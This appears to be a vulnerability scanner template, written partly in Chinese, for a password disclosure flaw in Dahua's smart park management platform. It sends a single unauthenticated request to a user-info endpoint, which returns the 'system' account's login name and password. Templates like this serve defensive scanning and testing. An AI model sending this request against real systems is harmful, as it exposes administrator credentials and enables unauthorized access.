漏洞描述
后台登录页面:http://xx.x.x.x/admin/login_login.action
id: dahua-zhyq-password-disclosure
info:
name: 大华智慧园区任意密码读取攻击
author: zan8in
severity: high
verified: true
description: |
后台登录页面:http://xx.x.x.x/admin/login_login.action
tags: dahua,disclosure
created: 2023/08/22
rules:
r0:
request:
method: GET
path: /admin/user_getUserInfoByUserName.action?userName=system
expression: response.status == 200 && response.body.bcontains(b'"loginName":"system"') && response.body.bcontains(b'"loginPass":')
expression: r0()